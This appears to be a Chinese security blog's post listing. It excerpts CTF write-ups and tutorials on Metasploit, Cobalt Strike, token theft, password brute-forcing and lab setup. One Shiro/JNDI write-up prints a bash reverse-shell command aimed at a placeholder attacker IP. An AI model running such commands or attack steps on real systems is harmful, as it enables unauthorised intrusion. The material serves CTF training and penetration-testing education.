- 博客(10)
- 收藏
- 关注
RSS订阅原创 长安战疫网络安全卫士守护赛 Shiro?
赛题:Shiro?需要准备的环境:反弹shell需要准备VPS、JNDI-Injection-Exploit工具启动rmi和ldap服务JNDI-Injection-Exploit 需要jdk、mvn环境编译VPS centos7mvnjdk打开赛题测试存在漏洞这里我用的是VPS的外网地址成功获取到请求响应反弹shell步骤bash -i >&/dev/tcp/x.x.x.x/1111 0>&1bash -c {echo,上面命令base64编码
2022-01-14 16:17:03
2618
原创 Metasploit GUI(Armiltage) 使用
一、目标1、添加目标点击Hosts 选项,添加一个目标然后设定目标ip的地址2、收集目标信息选中目标,点击右键scan,对目标进行扫描然后选中目标,点击右键service,可以查看到目标的端口情况选中目标,点击右键Host-> operating System 可以设定目标的系统版本这里可以先进行扫描(smb_version),会自动对目标系统进行标记3、psexec攻击目标(这里可以直接用smb,但是为了避免蓝屏,我们直接加用户,之后用 psexec 来快速获取权限
2021-05-04 15:06:52
698
原创 Metasploit的介绍
目录一、环境介绍windows 2008rkali linux 2020Metasploit 5.0二、 详细介绍1、模块分类:exploits:针对特定漏洞给的代码、或者利用脚本auxiliary:执行扫描、嗅探等相关功能的脚本post:攻击成功后,运行在受损目标上,以便收集有用数据、支持攻击者深入网络payloads:在攻击成功后执行的代码encodes:对相应的负载进行编码nops:攻击的时候方便用缓冲区溢出用的evasion:避免使用大多数防病毒产品的Met
2021-04-27 11:50:59
279
原创 cs与msf联动
目录cobalt strike和metasploit联动1.使用kali、vps来做cs和msf(这里我使用的vps是阿里云服务器)2.xshell连接vps,进入msf使用模块use expsploit/multi/handler3.如果vps没有metersploit就用命令行下载 github(Installing)这里我是已经下载好了的4.在模块里进行设置,我这里使用的IP是阿里云的内网IP(端口随便)5.记住xshell的防火墙要关闭(这里我的已经关了)看到绿色标注的“act
2021-04-26 18:24:23
486
原创 令牌窃取
令牌窃取1、首先这里我们要准备两台虚拟机(我使用的是parrot和win7)2、获得目标机器的 meterpreter shell3、获取到shell后getuid查看权限,首先输入use incognito,然后输入list_tokens -u列出可用的令牌。4、在incognito调用impersonate_token假冒Administrator用户进行渗透测试.注意此处是两个反斜杠5、最后执行shell命令并输入“whoami”...
2021-04-20 11:51:51
147
原创 微信小程序包提取
目录首先我们这里的要准备一个安卓模拟器,这里我用的雷电模拟器,这个也可以用其他的模拟器可以自行选择。在模拟器上下载微信并登录之后找到对应的⼩程序点击打开即可(因为兼容性问题,在 安卓模拟器中微信⼩程序可能会闪退,但这并不影响后续操作,⼩程序数据包已经成⾃带下载了)。接 着我们便能在安卓保存路径:/data/data/com.tencent.mm/MicroMsg/{⽤户ID}/appbrand/pkg/ 下;iOS保存路径:/var/mobile/Containers/Data/Appl
2021-03-24 08:53:52
2337
原创 一道爆破密码题
题目:weak_auth目标:了解弱口令,掌握爆破的方法Writeup(1)打开目标网址,发现需要登陆,于是我们输入账号密码信息(2)我们随便输入一个账号密码登陆测试一下,出现下图所示(3)看到上图所示,我们下面使用admin账户进行登陆试试,密码自己随便填写一个(4)结果还是失败,但是从结果显示可以看出,我们可以对密码进行爆破(5)接下来我们查看一下check.php的源代码,从中更加确定了我们对密码进行爆破(6)接下来我们使用burpsuite抓包软件进行爆破(这里需要一个
2020-12-17 22:07:55
1045
原创 虚拟机安装centos 7镜像教程
安装centos服务器0x01 centos系统介绍CentOS(Community ENTerprise Operating System)是Linux发行版之一,它是来自于Red Hat Enterprise Linux依照开放源代码规定释出的源代码所编译而成。由于出自同样的源代码,因此有些要求高度稳定性的服务器以CentOS替代商业版的Red Hat Enterprise Linux使用。两者的不同,在于CentOS并不包含封闭源代码软件。0x02 centos 系统镜像下载1.中科大镜像站
2020-09-10 17:47:03
2705
原创 漏洞挖掘基础(环境搭建)
漏洞挖掘基础-目录第一章 靶机环境搭建0x01 介绍 VMware是一个虚拟PC的软件,可以在现有的操纵系统上虚拟出一个新的硬件环境,相当于模拟出一台新的PC,以此来实现在一台机器上真正同时运行两个独立的操作系统。 VMware的主要特点: 1.不需要区分或重新开机就能在同一台PC上使用两种以上的操作系统;2.本机系统可以与虚拟机系统网络通信;3.可以设定并且随时修改虚拟机操作系统的硬件环境。2.安装 vmware workstation0x01 下载 vmware workstat
2020-09-09 17:57:27
499
原创 菜鸟语法
一、markdown 语法1.标题# 这是一级标题## 这是二级标题### 这是三级标题#### 这是四级标题##### 这是五级标题2.代码段这是一段代码这是一段代码print(123)3.超链接baidutaobao4.图片
2020-09-09 13:25:11
140
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人